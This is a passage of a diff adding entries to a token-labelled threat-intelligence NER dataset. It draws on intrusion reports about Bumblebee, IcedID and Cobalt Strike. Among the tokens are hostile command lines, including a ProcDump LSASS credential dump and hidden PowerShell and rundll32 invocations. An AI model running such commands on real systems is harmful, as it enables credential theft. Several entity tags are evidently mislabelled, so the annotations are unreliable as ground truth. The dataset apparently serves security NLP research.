[ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "stored", + "as", + "a", + "list", + "of", + "registry", + "keys,", + "yet", + "we", + "also", + "observed", + "a", + "variant", + "in", + "which", + "similar", + "content", + "was", + "written", + "into", + "a", + "TXT", + "file." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "obfuscated", + "Powershell", + "script", + "that", + "runs", + "another", + "Base64", + "obfuscated", + "layer", + "that", + "finally", + "decodes", + "the", + ".NET", + "payload." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "embedded", + "inside", + "as", + "a", + "base64", + "encoded", + "buffer" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "In", + "its", + "resources", + "we", + "can", + "find", + "another", + "PE" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "been", + "obfuscated", + "in", + "order", + "to", + "hide", + "its", + "real", + "intentions" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Base64", + "encoded", + "string,", + "and", + "in", + "the", + "other", + "as", + "a", + "hexadecimal", + "string" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PE", + "file", + "was", + "encoded", + "as", + "an", + "obfuscated", + "hexadecimal", + "string." + ], + "ner_tags": [ + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Base64", + "encoded", + "script" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Base64" + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "obfuscated", + "by", + "XOR" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "three", + "layers", + "where", + "one", + "decodes", + "content", + "for", + "the", + "next" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "decodes", + "the", + "next", + "element:" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "deobfuscates", + "and", + "runs", + "another", + "block", + "of", + "code" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "deobfuscate", + "it." + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "decodes", + "it" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "deobfuscate", + "the", + "file" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "decoding" + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "decoding" + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "Decoded", + "content" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "Decoded", + "content" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "deobfuscates" + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "was", + "decoded" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "decoding", + "the", + "base64-encoded", + "content," + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "decompressed" + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "reading/writing", + "registry", + "keys" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "written", + "to", + "the", + "registry,", + "as", + "a", + "list", + "of", + "keys." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "JavaScript", + "fetched", + "from", + "the", + "C2", + "server" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "downloaded", + "code", + "chunk" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GET", + "request", + "with", + "C2", + "server" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Process", + "Hollowing", + "–", + "one", + "of", + "the", + "classic", + "methods", + "of", + "PE", + "injection" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "PE", + "injection,", + "manual", + "loading", + "into", + "the", + "parent", + "process" + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "fetches", + "IcedID", + "from", + "a", + "remote", + "resource" + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Malicious", + "OneNote", + "attachment" + ], + "ner_tags": [ + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "The", + "“Forked”", + "version", + "of", + "the", + "malware", + "loader", + "first", + "appeared", + "in", + "February", + "2023,", + "distributed", + "directly", + "through", + "thousands", + "of", + "personalized", + "invoice-themed", + "phishing", + "emails." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Time", + "B-Exp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "These", + "messages", + "used", + "Microsoft", + "OneNote", + "attachments", + "(.one)", + "to", + "execute", + "a", + "malicious", + "HTA", + "file" + ], + "ner_tags": [ + "O", + "O", + "O", + "I-SamFile", + "B-SecTeam", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "string-decryption", + "code" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "sending", + "basic", + "host", + "info", + "to", + "the", + "C2" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "took", + "place", + "over", + "an", + "unencrypted", + "HTTP", + "channel,", + "the", + "network", + "traffic", + "was", + "plainly", + "visible." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Way", + "I-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "When", + "the", + "user", + "double", + "clicks", + "or", + "opens", + "the", + "lnk", + "file," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "lures", + "the", + "user", + "to", + "open", + "a", + "document.lnk", + "file", + "which", + "will", + "execute", + "the", + "malicious", + "DLL", + "loader" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "execution", + "phase", + "started", + "with", + "that", + "password", + "protected", + "zip,", + "which", + "after", + "extracting", + "would", + "show", + "the", + "user", + "an", + "ISO", + "file", + "that", + "after", + "the", + "user", + "double", + "clicks" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "starts", + "a", + "hidden", + "file", + "in", + "the", + "directory" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "then", + "proceeded", + "to", + "inject", + "into", + "various", + "other", + "processes", + "on", + "the", + "host", + "(explorer.exe,", + "rundll32.exe)." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile" + ] + }, + { + "tokens": [ + "From", + "these", + "injected", + "processes," + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "different", + "processes", + "they", + "injected", + "into" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "a", + "process", + "where", + "Cobalt", + "Strike", + "was", + "injected", + "into" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "process", + "injection", + "technique", + "was", + "used", + "multiple", + "times", + "to", + "inject", + "into", + "different", + "processes" + ], + "ner_tags": [ + "O", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Almost", + "every", + "post-exploitation", + "job", + "was", + "launched", + "from", + "an", + "injected", + "process." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "a", + "process", + "where", + "the", + "threat", + "actors", + "injected:" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "where", + "they", + "were", + "previously", + "injected", + "into" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Threat", + "actors", + "performed", + "the", + "first", + "lateral", + "movement", + "from", + "the", + "beachhead", + "to", + "the", + "server", + "using", + "RDP", + "with", + "an", + "Administrator", + "account" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "previously", + "injected", + "into" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Process", + "injections", + "in", + "svchost", + "process", + "via", + "CreateRemoteThread,", + "Default", + "named", + "pipes,", + "etc" + ], + "ner_tags": [ + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "processes", + "which", + "threat", + "actors", + "injected", + "into:" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "After", + "injecting", + "into", + "various", + "processes", + "on", + "the", + "host," + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "various", + "injections", + "across", + "hosts" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "injected", + "into", + "multiple", + "processes", + "on", + "different", + "hosts." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "threat", + "actors", + "began", + "discovery", + "tasks", + "using", + "Windows", + "utilities" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "These", + "batch", + "scripts’", + "purposes" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "then", + "two", + "batch", + "scripts", + "were", + "dropped", + "and", + "run." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "using", + "the", + "following", + "command", + "line:", + "C:\\Windows\\System32\\cmd.exe", + "/c" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "C:\\Windows\\system32\\cmd.exe", + "/C", + "powershell.exe", + "-nop", + "-w", + "hidden", + "-c" + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "launching", + "the", + "getsystem", + "command", + "in", + "the", + "wrong", + "console", + "(shell", + "console", + "rather", + "than", + "the", + "beacon", + "console)." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "C:\\Windows\\system32\\cmd.exe", + "/C", + "getsystem" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "cmd.exe", + "/C" + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile" + ] + }, + { + "tokens": [ + "C", + ":\\Windows\\system32\\cmd.exe", + "/C", + "shell" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Threat", + "actors", + "used", + "two", + "scripts", + "named", + "s.bat", + "(for", + "servers)", + "and", + "w.bat" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "bat", + "script:" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "bat", + "script:" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "using", + "Windows", + "utilities", + "like", + "ping", + "and", + "tasklist." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "tasklist" + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "tasklist", + "was", + "also", + "used", + "in", + "order", + "to", + "enumerate", + "processes", + "on", + "multiple", + "hosts", + "remotely" + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "process", + "list" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "threat", + "actor", + "started", + "their", + "first", + "lateral", + "movement", + "using", + "RDP" + ], + "ner_tags": [ + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "they", + "accessed", + "the", + "server", + "via", + "RDP" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Threat", + "actors", + "used", + "explorer.exe,", + "where", + "they", + "were", + "previously", + "injected", + "into,", + "to", + "initiate", + "a", + "proxied", + "RDP", + "connection", + "to", + "a", + "server:" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "threat", + "actor", + "started", + "their", + "first", + "lateral", + "movement", + "using", + "RDP", + "to", + "pivot", + "to", + "a", + "server", + "using", + "the", + "local", + "Administrator", + "account." + ], + "ner_tags": [ + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "first", + "lateral", + "movement", + "from", + "the", + "beachhead", + "to", + "the", + "server", + "using", + "RDP", + "with", + "an", + "Administrator", + "account:" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "and", + "again", + "on", + "a", + "server", + "with", + "Administrator", + "privileges." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "using", + "the", + "Administrator", + "account", + "each", + "time" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "to", + "execute", + "Procdump,", + "which", + "was", + "used", + "to", + "dump", + "lsass." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg" + ] + }, + { + "tokens": [ + "they", + "used", + "yet", + "another", + "technique", + "to", + "dump", + "LSASS", + "on", + "the", + "beachhead", + "host,", + "this", + "time", + "using", + "a", + "built", + "in", + "Windows", + "tool", + "comsvcs.dll." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "B-SamFile" + ] + }, + { + "tokens": [ + "dumping", + "their", + "LSASS", + "process" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LSASS", + "Dump" + ], + "ner_tags": [ + "B-Idus", + "B-SecTeam" + ] + }, + { + "tokens": [ + "Threat", + "actors", + "dumped", + "the", + "LSASS", + "process", + "from", + "the", + "beachhead", + "using", + "the", + "comsvcs.dll", + "MiniDump", + "technique" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SecTeam", + "O" + ] + }, + { + "tokens": [ + "C:\\programdata\\procdump64.exe", + "-accepteula", + "-ma", + "lsass.exe", + "C:\\ProgramData\\lsass.dmp" + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile" + ] + }, + { + "tokens": [ + "Threat", + "actors", + "also", + "dropped", + "procdump.exe", + "and", + "procdump64.exe", + "on", + "multiple", + "workstations", + "remotely,", + "dumped", + "LSASS," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Next,", + "the", + "threat", + "actor", + "transferred", + "Sysinternals", + "tool", + "Procdump", + "over", + "SMB,", + "to", + "the", + "ProgramData", + "folders", + "on", + "multiple", + "hosts", + "in", + "the", + "environment." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Using", + "the", + "Cobalt", + "Strike", + "beacon,", + "the", + "threat", + "actors", + "transferred", + "AnyDesk", + "(1).exe", + "file", + "from", + "the", + "beachhead", + "to", + "a", + "server:" + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "threat", + "actors", + "also", + "transferred", + "ProcDump", + "from", + "the", + "beachhead", + "to", + "multiple", + "workstations:" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "This", + "first", + "lateral", + "movement", + "was", + "performed", + "in", + "order", + "to", + "drop", + "and", + "install", + "AnyDesk." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "threat", + "actors", + "remotely", + "dropped", + "AnyDesk", + "binary", + "on", + "a", + "server", + "from", + "the", + "beachhead:" + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "used", + "PowerShell", + "to", + "download", + "and", + "execute" + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "which", + "downloaded", + "obfuscated", + "PowerShell", + "and", + "executed", + "it", + "in", + "memory:" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "just", + "C2", + "communications;", + "until", + "around", + "3", + "hours", + "later,", + "Bumblebee", + "dropped", + "a", + "Cobalt", + "Strike", + "beacon" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool" + ] + }, + { + "tokens": [ + "dropping", + "and", + "the", + "execution", + "of", + "several", + "payloads", + "using", + "multiple", + "techniques" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "threat", + "actors", + "used", + "CS", + "as", + "the", + "main", + "Command", + "and", + "Control", + "tool,", + "dropped", + "several", + "payloads," + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "threat", + "actors", + "used", + "a", + "service", + "account", + "to", + "execute", + "a", + "Cobalt", + "Strike", + "beacon", + "remotely", + "on", + "a", + "Domain", + "Controller." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "C:\\Windows\\System32\\cmd.exe", + "/c", + "start", + "rundll32", + "namr.dll,IternalJob" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-SamFile", + "B-SamFile" + ] + }, + { + "tokens": [ + "Sysmon", + "File", + "Created", + "event", + "showing", + "wab.exe", + "created", + "by", + "rundll32.exe" + ], + "ner_tags": [ + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "cmd.exe", + "/C", + "rundll32.exe" + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile", + "B-SamFile" + ] + }, + { + "tokens": [ + "C:\\Windows\\System32\\rundll32.exe" + ], + "ner_tags": [ + "B-SamFile" + ] + }, + { + "tokens": [ + "Because", + "rundll32.exe", + "executed", + "PowerShell,", + "we", + "can", + "see", + "that", + "rundll32.exe", + "created" + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "were", + "initiated", + "from", + "the", + "rundll32.exe", + "process" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "The", + "random", + "(PsExec)", + "service", + "runs", + "a", + "rundll32.exe", + "process", + "without", + "any", + "arguments." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "metadata", + "included", + "TA", + "machine’s", + "hostname," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "systeminfo" + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "wmic", + "product", + "get", + "name,version" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "“Display", + "information", + "about", + "current", + "Windows", + "version" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MAC", + "address" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "ipconfig", + "/all" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "showing", + "wab.exe", + "executed", + "by", + "WMI" + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "O", + "B-SecTeam" + ] + }, + { + "tokens": [ + "wmic", + "/node" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "wmic" + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "obfuscated", + "PowerShell" + ], + "ner_tags": [ + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Once", + "deobfuscated," + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "its", + "installation", + "as", + "a", + "service", + "was", + "used", + "in", + "order", + "to", + "persist", + "and", + "create", + "a", + "backdoor", + "to", + "the", + "network." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "win32", + "function", + "CreateServiceA", + "was", + "used", + "by", + "the", + "malware", + "in", + "order", + "to", + "create", + "a", + "remote", + "service", + "over", + "RPC", + "on", + "the", + "server." + ], + "ner_tags": [ + "O", + "B-Way", + "B-Tool", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "a", + "remote", + "service", + "was", + "created", + "with", + "random", + "alphanumeric", + "characters,", + "service", + "name", + "and", + "service", + "file", + "name" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Below", + "is", + "an", + "example", + "of", + "the", + "service", + "edc603a", + "that", + "was", + "created" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "A", + "new", + "service", + "was", + "created" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Threat", + "actors", + "obtained", + "and", + "abused", + "credentials", + "of", + "privilege", + "domain", + "accounts" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "A", + "service", + "account,", + "with", + "Domain", + "Administration", + "permissions,", + "was", + "used", + "to", + "create", + "a", + "remote", + "service", + "on", + "a", + "Domain", + "Controller", + "to", + "move", + "laterally." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "service", + "account", + "logged", + "into", + "one", + "of", + "the", + "Domain", + "Controllers", + "from", + "the", + "beachhead." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "We", + "observed", + "the", + "threat", + "actors", + "deleting", + "their", + "tools", + "(Procdump,", + "Network", + "scanning", + "scripts,", + "etc.)", + "from", + "hosts." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ProcDump", + "deletion", + "from", + "the", + "ProgramData", + "folder", + "of", + "all", + "targeted", + "workstations", + "after", + "dumping", + "their", + "LSASS", + "process:" + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Threat", + "actors", + "also", + "dropped", + "procdump.exe", + "and", + "procdump64.exe", + "on", + "multiple", + "workstations", + "remotely,", + "dumped", + "LSASS,", + "and", + "deleted", + "them", + "from", + "the", + "ProgramData", + "folder:" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "whoami" + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "C", + ":\\Windows\\system32\\cmd.exe", + "/C", + "shell", + "whoami", + "/all" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "win32", + "function", + "CreateServiceA", + "was", + "used", + "by", + "the", + "malware" + ], + "ner_tags": [ + "O", + "B-Way", + "B-Tool", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "account", + "used", + "to", + "perform", + "this", + "lateral", + "movement" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Threat", + "actors", + "executed", + "this", + "tool", + "on", + "patient", + "0", + "with", + "low-level", + "privileges", + "multiple", + "times" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "threat", + "actor", + "then", + "deployed", + "Anydesk,", + "which", + "was", + "the", + "only", + "observed", + "persistence", + "mechanism", + "used", + "during", + "the", + "intrusion." + ], + "ner_tags": [ + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "they", + "accessed", + "the", + "server", + "via", + "Anydesk." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "AnyDesk", + "and", + "its", + "installation", + "as", + "a", + "service", + "was", + "used" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AnyDesk", + "logs,", + "%ProgramData%\\AnyDesk\\ad_svc.trace", + "and", + 